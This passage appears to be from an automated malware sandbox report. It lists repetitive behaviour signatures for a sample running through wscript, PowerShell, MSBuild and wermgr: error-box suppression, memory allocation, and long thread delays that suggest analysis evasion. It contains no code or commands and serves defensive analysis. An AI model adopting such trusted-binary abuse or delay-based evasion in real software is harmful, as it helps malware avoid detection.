              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4BF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599108Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598628Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597944Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597499Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597389Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597154Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596245Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595898Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595311Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3401Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6451Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7573Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2273Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8084Thread sleep count: 7573 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8084Thread sleep count: 2273 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599218s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -599108s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598984s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598628s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598500s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598390s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598281s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598171s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -598062s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597944s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597718s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597609s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597499s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597389s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597265s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597154s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -597031s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596922s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596812s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596703s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596594s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596483s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596373s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596245s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596125s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -596015s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595898s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595311s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595187s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594640s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8080Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599108Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598628Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598171Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597944Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597499Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597389Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597154Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597031Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596922Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596483Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596245Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595898Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595311Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595078Jump to behavior
